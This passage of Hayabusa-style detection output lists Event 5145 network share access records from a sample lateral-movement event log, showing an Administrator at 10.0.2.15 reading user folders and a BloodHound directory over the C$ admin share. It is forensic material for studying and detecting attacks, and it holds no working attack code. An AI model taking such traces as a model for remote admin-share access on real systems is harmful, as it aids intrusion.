LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib | IP 
Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async | IP Addr: 
10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js 
| IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | 